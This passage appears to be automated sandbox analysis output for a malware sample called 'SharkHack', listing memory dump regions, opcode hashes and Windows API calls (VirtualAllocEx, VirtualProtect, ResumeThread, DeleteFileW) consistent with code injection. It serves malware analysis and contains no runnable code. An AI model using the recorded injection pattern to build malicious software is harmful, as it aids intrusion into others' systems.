                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2880619802.00000000059D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 059D0000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_59d0000_SharkHack.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: ProtectVirtual
                                                                                                          • String ID:
                                                                                                          • API String ID: 544645111-0
                                                                                                          • Opcode ID: 51eddd81c77d4dcc8e34923e8768c0ef487fe4610f43de05af96e68256e50fc2
                                                                                                          • Instruction ID: cef452a065928e288e2e816033690de96e16f1e498e80f31288524f5d756b086
                                                                                                          • Opcode Fuzzy Hash: 51eddd81c77d4dcc8e34923e8768c0ef487fe4610f43de05af96e68256e50fc2
                                                                                                          • Instruction Fuzzy Hash: 812115B18002499FDB10DFAAC544BEEFBF5EF88320F10842AD959A7250C778A944DFA5
                                                                                                          APIs
                                                                                                          • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 059D1DD6
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2880619802.00000000059D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 059D0000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_59d0000_SharkHack.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: AllocVirtual
                                                                                                          • String ID:
                                                                                                          • API String ID: 4275171209-0
                                                                                                          • Opcode ID: 97103c76f526b18c87635ac813b972c7ae82877d240e4c899a4b68e4e056407b
                                                                                                          • Instruction ID: e923bec23cdd8db320dbb66b4dd7dcb490a61c317c65113b8eee61fc5ba34c79
                                                                                                          • Opcode Fuzzy Hash: 97103c76f526b18c87635ac813b972c7ae82877d240e4c899a4b68e4e056407b
                                                                                                          • Instruction Fuzzy Hash: 6A1147B69002499FCB20DFAAD844BEFFFF5EB48324F108429E559A7250C735A544DBA4
                                                                                                          APIs
                                                                                                          • DeleteFileW.KERNELBASE(00000000), ref: 08EFC188
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2890193084.0000000008EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 08EF0000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_8ef0000_SharkHack.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: DeleteFile
                                                                                                          • String ID:
                                                                                                          • API String ID: 4033686569-0
                                                                                                          • Opcode ID: 7a6272ccbcbf2eedb963d84bc528546a7263e4fee016e7f176c54dd15cfbfe2d
                                                                                                          • Instruction ID: e2b5739bb9db222fcbe71de3bd40cae1c5ec5e1500485c7390c96c1d4f61de93
                                                                                                          • Opcode Fuzzy Hash: 7a6272ccbcbf2eedb963d84bc528546a7263e4fee016e7f176c54dd15cfbfe2d
                                                                                                          • Instruction Fuzzy Hash: 4F1147B2C006699BCB10CF9AC5447DEFBF4EF48320F20812AD818A7241D338A954CFA5
                                                                                                          APIs
                                                                                                          • VirtualProtect.KERNELBASE(?,?,?,?), ref: 089C8AA3
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2889924060.00000000089C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 089C0000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_89c0000_SharkHack.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: ProtectVirtual
                                                                                                          • String ID:
                                                                                                          • API String ID: 544645111-0
                                                                                                          • Opcode ID: 49118f3147578f03d1f7fc00320e95c122a59281b71aa763669bfffd3301e1b1
                                                                                                          • Instruction ID: cd9bcb1ed67c71e535a14d4cc50e0af92295451ab7072388028caddc53506c2a
                                                                                                          • Opcode Fuzzy Hash: 49118f3147578f03d1f7fc00320e95c122a59281b71aa763669bfffd3301e1b1
                                                                                                          • Instruction Fuzzy Hash: 5821E4B59002499FCB10DF9AC884BDEFBF8FB48320F108429E958A7251D379A644CFA5
APIs
• VirtualProtect.KERNELBASE(?,?,?,?), ref: 08A0FCC3
Memory Dump Source
• Source File: 00000000.00000002.2889982132.0000000008A00000.00000040.00000800.00020000.00000000.sdmp, Offset: 08A00000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_8a00000_SharkHack.jbxd
Similarity
• API ID: ProtectVirtual
• String ID:
• API String ID: 544645111-0
APIs
• VirtualProtect.KERNELBASE(?,?,?,?), ref: 089C8AA3
Memory Dump Source
• Source File: 00000000.00000002.2889924060.00000000089C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 089C0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_89c0000_SharkHack.jbxd
Similarity
• API ID: ProtectVirtual
• String ID:
• API String ID: 544645111-0
APIs
• VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 059D1DD6
Memory Dump Source
• Source File: 00000000.00000002.2880619802.00000000059D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 059D0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_59d0000_SharkHack.jbxd
Similarity
• API ID: AllocVirtual
• String ID:
• API String ID: 4275171209-0
APIs
• OutputDebugStringW.KERNELBASE(00000000), ref: 06021040
Memory Dump Source
• Source File: 00000000.00000002.2882067890.0000000006020000.00000040.00000800.00020000.00000000.sdmp, Offset: 06020000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_6020000_SharkHack.jbxd
Similarity
• API ID: DebugOutputString
• String ID:
• API String ID: 1166629820-0
APIs
Memory Dump Source
• Source File: 00000000.00000002.2880619802.00000000059D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 059D0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_59d0000_SharkHack.jbxd
Similarity
• API ID: ResumeThread
• String ID:
• API String ID: 947044025-0
APIs
• OutputDebugStringW.KERNELBASE(00000000), ref: 06021040
Memory Dump Source
• Source File: 00000000.00000002.2882067890.0000000006020000.00000040.00000800.00020000.00000000.sdmp, Offset: 06020000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_6020000_SharkHack.jbxd
Similarity
• API ID: DebugOutputString
• String ID:
• API String ID: 1166629820-0
APIs
Memory Dump Source
• Source File: 00000000.00000002.2880619802.00000000059D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 059D0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_59d0000_SharkHack.jbxd
Similarity
• API ID: ResumeThread
• String ID:
• API String ID: 947044025-0
APIs
• PostMessageW.USER32(?,00000010,00000000,?), ref: 059D4D95
Memory Dump Source
• Source File: 00000000.00000002.2880619802.00000000059D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 059D0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_59d0000_SharkHack.jbxd
Similarity
• API ID: MessagePost
• String ID:
• API String ID: 410705778-0
APIs
• PostMessageW.USER32(?,00000010,00000000,?), ref: 059D4D95
Memory Dump Source
• Source File: 00000000.00000002.2880619802.00000000059D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 059D0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_59d0000_SharkHack.jbxd
Similarity
• API ID: MessagePost
• String ID:
• API String ID: 410705778-0
APIs
• OutputDebugStringW.KERNELBASE(00000000), ref: 06021040
Memory Dump Source
• Source File: 00000000.00000002.2882067890.0000000006020000.00000040.00000800.00020000.00000000.sdmp, Offset: 06020000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_6020000_SharkHack.jbxd
Similarity
• API ID: DebugOutputString
• String ID:
• API String ID: 1166629820-0
Strings
Memory Dump Source
• Source File: 00000000.00000002.2889664682.0000000008740000.00000040.00000800.00020000.00000000.sdmp, Offset: 08740000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_8740000_SharkHack.jbxd
Similarity
• API ID:
• String ID: 4'^q
• API String ID: 0-1614139903
Strings
Memory Dump Source
• Source File: 00000000.00000002.2889664682.0000000008740000.00000040.00000800.00020000.00000000.sdmp, Offset: 08740000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_8740000_SharkHack.jbxd
Similarity
• API ID:
• String ID: (bq
• API String ID: 0-149360118
Memory Dump Source
• Source File: 00000000.00000002.2889664682.0000000008740000.00000040.00000800.00020000.00000000.sdmp, Offset: 08740000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_8740000_SharkHack.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
Memory Dump Source
• Source File: 00000000.00000002.2889664682.0000000008740000.00000040.00000800.00020000.00000000.sdmp, Offset: 08740000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_8740000_SharkHack.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
Memory Dump Source
• Source File: 00000000.00000002.2889664682.0000000008740000.00000040.00000800.00020000.00000000.sdmp, Offset: 08740000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_8740000_SharkHack.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
Memory Dump Source
• Source File: 00000000.00000002.2889664682.0000000008740000.00000040.00000800.00020000.00000000.sdmp, Offset: 08740000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_8740000_SharkHack.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
                                                                                                          • Opcode ID: a1f845f1d60b43a4324e1b0328313e50f5ad3855706a602409b614abc26644e3
                                                                                                          • Instruction ID: 190597a0c30b6babfae5f65a1d21d0b9c6fdf41358fb6a738856de3baff64eb5
                                                                                                          • Opcode Fuzzy Hash: a1f845f1d60b43a4324e1b0328313e50f5ad3855706a602409b614abc26644e3
                                                                                                          • Instruction Fuzzy Hash: 6CF12E79E14214CBC704AF78EA8829CBBF1FB48725F408869D44AE7354DF349D568FA1
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2889664682.0000000008740000.00000040.00000800.00020000.00000000.sdmp, Offset: 08740000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_8740000_SharkHack.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: 5346ad1a327dc3f909976d75ade34d546d6ceb53cff6da61ef6c68e45c0ac4d9
                                                                                                          • Instruction ID: 50cd88dad8b5be2f1d77225b9f7622484e46afc88e82d057d13a85f1e1c58442
                                                                                                          • Opcode Fuzzy Hash: 5346ad1a327dc3f909976d75ade34d546d6ceb53cff6da61ef6c68e45c0ac4d9
                                                                                                          • Instruction Fuzzy Hash: FAE19130609741CFC316AB79D8981297FF1EF86614F4589EED4C9CB2A6DB388C4AC752
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2889664682.0000000008740000.00000040.00000800.00020000.00000000.sdmp, Offset: 08740000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_8740000_SharkHack.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: dd037232f829851d2f2649ed61077564bc6208e1027f721ce7f585baa11dc069
                                                                                                          • Instruction ID: 0ee95f0550122e801e9d68384139bc977cbb6e8dfd6e186cf4a823abd5b9212f
                                                                                                          • Opcode Fuzzy Hash: dd037232f829851d2f2649ed61077564bc6208e1027f721ce7f585baa11dc069
                                                                                                          • Instruction Fuzzy Hash: DAD1BE34A01211DBC705FFB9E98866DBBF1FF88614F458469D489A7344DF389C46CBA2
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2889664682.0000000008740000.00000040.00000800.00020000.00000000.sdmp, Offset: 08740000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_8740000_SharkHack.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: df8ff99f85a41b1c9af187dac2c6e4844ea19fed3b9ae9bd9cdf9aed70508a65
                                                                                                          • Instruction ID: 89cf99d5e778169591dbca6e206b39d9a31082aa8ad0cc24d421543e0cfc1f1e
                                                                                                          • Opcode Fuzzy Hash: df8ff99f85a41b1c9af187dac2c6e4844ea19fed3b9ae9bd9cdf9aed70508a65
                                                                                                          • Instruction Fuzzy Hash: 86A1CF35A05211DFC705EBB8E98866DBFF1EF89210F4984AAD489D7341DF389C46CB62
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2889664682.0000000008740000.00000040.00000800.00020000.00000000.sdmp, Offset: 08740000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_8740000_SharkHack.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: 153ca6a5b03eae3498cb3e979d4fdb179afdc5b92ae3675e3d01d09bfb3dca56
                                                                                                          • Instruction ID: f9a627d406e38d1220d0038e2b5274d945e0cc73281a6a64fb6ff3c8c4819dcc
                                                                                                          • Opcode Fuzzy Hash: 153ca6a5b03eae3498cb3e979d4fdb179afdc5b92ae3675e3d01d09bfb3dca56
                                                                                                          • Instruction Fuzzy Hash: 6F81B530A10515CBCB04BFB9E88416DBBF5FF88614F81896EE489A7345DF38885AC767
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2889664682.0000000008740000.00000040.00000800.00020000.00000000.sdmp, Offset: 08740000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_8740000_SharkHack.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: a8ebab876300eed1e01cf8ad1f9a70d1457effa75a140cd4e57cd95862bc76a7
                                                                                                          • Instruction ID: 85a0922110bfdddf2c8160a5137ad4849503294eb648e30b488f73addd2dee2b
                                                                                                          • Opcode Fuzzy Hash: a8ebab876300eed1e01cf8ad1f9a70d1457effa75a140cd4e57cd95862bc76a7
                                                                                                          • Instruction Fuzzy Hash: 6A51C375B10615CBC704FFB9E99966EBBF2EB88614F44842AD448E7344DE38DC0AC792
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2889664682.0000000008740000.00000040.00000800.00020000.00000000.sdmp, Offset: 08740000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_8740000_SharkHack.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: d3fe6379e89dd45abcf0a15e19cd251b1b8c082f8b3a2915e6e68bead2b52d15
                                                                                                          • Instruction ID: 2a445debc8675fe029ea80954fc2ce7e86c1f72cedd0f74c8eb6b065becabfc3
                                                                                                          • Opcode Fuzzy Hash: d3fe6379e89dd45abcf0a15e19cd251b1b8c082f8b3a2915e6e68bead2b52d15
                                                                                                          • Instruction Fuzzy Hash: E7416B31A107099BCB14DFA9C49469DFBB1FF88301F14D66DE809BB225EB70A985CB90
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2889664682.0000000008740000.00000040.00000800.00020000.00000000.sdmp, Offset: 08740000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_8740000_SharkHack.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: 4f8e347d7346ed4ce87ed68841d4d4dc72a33041e65bd95286ad09fd5c0ffb22
                                                                                                          • Instruction ID: 2cb06487789ea9eea78babf1010f51fc4480510ea6d19f2f119d68bec7505ebc
                                                                                                          • Opcode Fuzzy Hash: 4f8e347d7346ed4ce87ed68841d4d4dc72a33041e65bd95286ad09fd5c0ffb22
                                                                                                          • Instruction Fuzzy Hash: CC3146B5D002198FCB10EFA9D844ADEBBF5EB48311F50842AD815B7350DB78A945CBA1
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2889664682.0000000008740000.00000040.00000800.00020000.00000000.sdmp, Offset: 08740000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_8740000_SharkHack.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: 17e5a8a5ba1112383931bbc14da1942e7892d176094cc6534aa352b35640f1ca
                                                                                                          • Instruction ID: 3e69d776c83cc8e7f25beb72436be3eef891090e7c84b3f4fb8f55203dfcb183
                                                                                                          • Opcode Fuzzy Hash: 17e5a8a5ba1112383931bbc14da1942e7892d176094cc6534aa352b35640f1ca
                                                                                                          • Instruction Fuzzy Hash: 21319E5660E3E06FD7176A3C5C305EA3FA49E9315570A00DBE0C0CF1A7D519898AC3FA
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2889664682.0000000008740000.00000040.00000800.00020000.00000000.sdmp, Offset: 08740000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_8740000_SharkHack.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: 09fa667b188b87fae008b6f4ab3b39de5e2f9720dd6a6020994b7ffea774dfc8
                                                                                                          • Instruction ID: 0ff993b34d0b09981519d72e8f2248c5bf945a1adac5dd1a0488376470ea59ae
                                                                                                          • Opcode Fuzzy Hash: 09fa667b188b87fae008b6f4ab3b39de5e2f9720dd6a6020994b7ffea774dfc8
                                                                                                          • Instruction Fuzzy Hash: C831C574B04211DBD705ABBAE8547297BE9FF89615F408466E44DC3280DE3CEC02CB63
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2851356393.0000000001EBD000.00000040.00000800.00020000.00000000.sdmp, Offset: 01EBD000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_1ebd000_SharkHack.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: 5e0b36c43a4a2ee3b269e387583fcca9bd9eba4f3c69ae723fc6ecf04838f86a
                                                                                                          • Instruction ID: f92c5506009192c26637051d28edf39d4f9de93cf9f87488bf56907916d42163
                                                                                                          • Opcode Fuzzy Hash: 5e0b36c43a4a2ee3b269e387583fcca9bd9eba4f3c69ae723fc6ecf04838f86a
                                                                                                          • Instruction Fuzzy Hash: C9212571504200DFCB15DF58D9C4B5BBF66FB88318F20C56DD8094B256C33AD447CA61
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2851356393.0000000001EBD000.00000040.00000800.00020000.00000000.sdmp, Offset: 01EBD000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_1ebd000_SharkHack.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: 6697f5f87ae496b7a93d5666dc1a6336f1efef7d7d12825821a2f21c357b1d28
                                                                                                          • Instruction ID: 616d3eb3a60044c1683b354319f921745dfcd9216b2b04124fb162c98c87dca2
                                                                                                          • Opcode Fuzzy Hash: 6697f5f87ae496b7a93d5666dc1a6336f1efef7d7d12825821a2f21c357b1d28
                                                                                                          • Instruction Fuzzy Hash: BD210771504244DFDB05DF98D9C0B6BBBA5FB8872CF20C56DD9094B256C336D446CB61
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2889664682.0000000008740000.00000040.00000800.00020000.00000000.sdmp, Offset: 08740000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_8740000_SharkHack.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: c425cfb598584d5892576d2aba5305aea3209003d1dd48597fbb044826766d2d
                                                                                                          • Instruction ID: ba7ed7646099d798eb38e80613001986943472937e4e141de6d83e2d66adc2d8
                                                                                                          • Opcode Fuzzy Hash: c425cfb598584d5892576d2aba5305aea3209003d1dd48597fbb044826766d2d
                                                                                                          • Instruction Fuzzy Hash: D431F1B0D11218DFDB20DF99C588BDEBFF5AB48315F24802AE518BB255C3B5A845CFA4
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2851356393.0000000001EBD000.00000040.00000800.00020000.00000000.sdmp, Offset: 01EBD000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_1ebd000_SharkHack.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: 0b368d3f25953a53695be08e472848961865d8e47043b0c046b7f8166044269a
                                                                                                          • Instruction ID: 005e0057b4d456b6ba2518a0d70c0f9cfb629e2682f07d1251825e87c99883a9
                                                                                                          • Opcode Fuzzy Hash: 0b368d3f25953a53695be08e472848961865d8e47043b0c046b7f8166044269a
                                                                                                          • Instruction Fuzzy Hash: 5C2174755093808FD702CF24D994756BF71FB45318F28C5DAD8498B257C33A980ACB62
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2889664682.0000000008740000.00000040.00000800.00020000.00000000.sdmp, Offset: 08740000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_8740000_SharkHack.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: 215cc8e587cddfbdfaa46e91a2c8d4234e35b0689287cfc83d53e20b0a2520b7
                                                                                                          • Instruction ID: a543bdf2a4b8d0e9a973e6a3c16ba2ac85a7e7e5740bfb944c946e0450fa4065
                                                                                                          • Opcode Fuzzy Hash: 215cc8e587cddfbdfaa46e91a2c8d4234e35b0689287cfc83d53e20b0a2520b7
                                                                                                          • Instruction Fuzzy Hash: A611F935D0070A8ECB10EFA9D8804DEFBF4FF48311B50966AD559B3211E730AA95CBA0
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2851356393.0000000001EBD000.00000040.00000800.00020000.00000000.sdmp, Offset: 01EBD000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_1ebd000_SharkHack.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: 48042a67946fd5b471a152cae87ddc5a96e5ad52caa5f07da488830fbc7c129d
                                                                                                          • Instruction ID: 7d97cbc007b0bf2d27a3459010a1fbf57d757a996a0e515c6e0c2ba80116c5ef
                                                                                                          • Opcode Fuzzy Hash: 48042a67946fd5b471a152cae87ddc5a96e5ad52caa5f07da488830fbc7c129d
                                                                                                          • Instruction Fuzzy Hash: 8C11BE75504280DFDB02CF54C9C4B5ABF61FB84628F24C6A9D8494B256C33AD41ACB51
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2889664682.0000000008740000.00000040.00000800.00020000.00000000.sdmp, Offset: 08740000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_8740000_SharkHack.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: 09f8fee670556a9139ac5ebfa4db975216f44d5be827ba0588c7d229afb07744
                                                                                                          • Instruction ID: db28c4cf3ac6715b52228fe0dcf60e300bf99b541dbd2263c505a0abc5576ac1
                                                                                                          • Opcode Fuzzy Hash: 09f8fee670556a9139ac5ebfa4db975216f44d5be827ba0588c7d229afb07744
                                                                                                          • Instruction Fuzzy Hash: 6001F236B086510B871AEA2D58804BFBBB7AFC5121315883EE008CB31ADF308C078374
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2851310752.0000000001EAD000.00000040.00000800.00020000.00000000.sdmp, Offset: 01EAD000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_1ead000_SharkHack.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: d6029f8ad6cb5fa5a38b1859092a56709f6153cfa2451c4ab86fc36f7fe51ff9
                                                                                                          • Instruction ID: c387a8f7968757d8292e8d4701b4d1166f1329efda4100090c2b6b597d7d64a6
                                                                                                          • Opcode Fuzzy Hash: d6029f8ad6cb5fa5a38b1859092a56709f6153cfa2451c4ab86fc36f7fe51ff9
                                                                                                          • Instruction Fuzzy Hash: 3D01F7714083409AE7219B9ACD8476BFFE8FF45324F58D42AED1C0E586C239A840C6B1
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2889664682.0000000008740000.00000040.00000800.00020000.00000000.sdmp, Offset: 08740000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_8740000_SharkHack.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: 2af8a65b90deb66550c33dc99f21159de87a4d2b6b0b2feaf8de5ef9c3dd1187
                                                                                                          • Instruction ID: 559fea5eb807fe695d1cc69d8bf2eeb7b1d20a72653411b0a307e817f84a9dd4
                                                                                                          • Opcode Fuzzy Hash: 2af8a65b90deb66550c33dc99f21159de87a4d2b6b0b2feaf8de5ef9c3dd1187
                                                                                                          • Instruction Fuzzy Hash: 5701B175A4425A8FDB00EFA0D850AEEBBF5AF48211F10502AD801BB265DF34594ACBB1
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2889664682.0000000008740000.00000040.00000800.00020000.00000000.sdmp, Offset: 08740000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_8740000_SharkHack.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: 6a4bccb25e52f6aaec27c6c3b44271c5befb18fdd9a6ac710f402aafc6c2dde9
                                                                                                          • Instruction ID: 5586f67c68b32b71cc9f22767bf227bf103fdf24ec82406789e79413655c842d
                                                                                                          • Opcode Fuzzy Hash: 6a4bccb25e52f6aaec27c6c3b44271c5befb18fdd9a6ac710f402aafc6c2dde9
                                                                                                          • Instruction Fuzzy Hash: CAF09072B001258BC704ABB9EC8566DB7E6FB88614B44896AD449D3340DF38DC06C781
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2889664682.0000000008740000.00000040.00000800.00020000.00000000.sdmp, Offset: 08740000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_8740000_SharkHack.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: 660968e4af4bd64a8e156f12241bbe7874614e1fdfc384270df3a347d73ca38a
                                                                                                          • Instruction ID: bdefedf4fe3b3e2e56ba44e6e7ee7f5df59c990768a0bdcea96beb803fe16867
                                                                                                          • Opcode Fuzzy Hash: 660968e4af4bd64a8e156f12241bbe7874614e1fdfc384270df3a347d73ca38a
                                                                                                          • Instruction Fuzzy Hash: 210131B554E3C08FD713173898549603FB4AF4325270A44DAF484CA1B3DB798859D772
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2889664682.0000000008740000.00000040.00000800.00020000.00000000.sdmp, Offset: 08740000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_8740000_SharkHack.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: fbcf211e50bc04c6d62b24932c9d3d96f53736ce15d80a06e8b16fca4d17f5ab
                                                                                                          • Instruction ID: d97384301ce9b6c90b70d8bcf4491d2c3245e50ad6a18e674ac4bf2750be5881
                                                                                                          • Opcode Fuzzy Hash: fbcf211e50bc04c6d62b24932c9d3d96f53736ce15d80a06e8b16fca4d17f5ab
                                                                                                          • Instruction Fuzzy Hash: F4F082357452046FD3048A5E9C809AAEBEDEFD6620715406BF544C7361CA719C06C2A4
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2851310752.0000000001EAD000.00000040.00000800.00020000.00000000.sdmp, Offset: 01EAD000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_1ead000_SharkHack.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: b9c3bd6e63cc662b013c880d6b04e948d51676fdb0b304580726a67d8868cfe3
